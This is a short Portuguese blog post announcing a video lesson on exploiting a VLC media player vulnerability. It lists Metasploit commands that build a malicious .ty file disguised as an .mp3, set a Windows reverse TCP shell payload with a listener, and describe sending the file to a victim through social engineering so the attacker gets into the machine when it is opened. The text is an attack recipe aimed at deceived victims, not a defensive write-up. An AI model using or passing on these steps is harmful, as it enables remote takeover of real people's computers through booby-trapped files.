Nessa vídeo aula, mostro com explorar uma vulnerabilidade no VLC, esse ataque tem que ser usando com uma boa engenharia social. Criei um arquivos no metasploit chamado msf.ty onde podemos renomeá para qualquer arquivo suportado pelo VLC, no caso em questão usei .mp3. Com o arquivo enviado para vitima, quando a vitima executar no VLC entro dentro da maquina.
Comandos:
Citação:
use windows/fileformat/videolan_tivo set payload windows/shell/reverse_tcp set lhost Meu_IP set rport 1975 use exploit/multi/handler set payload windows/shell/reverse_tcp |
Assisti On-line: http://bhior.blip.tv/file/3600749
0 comentários:
Postar um comentário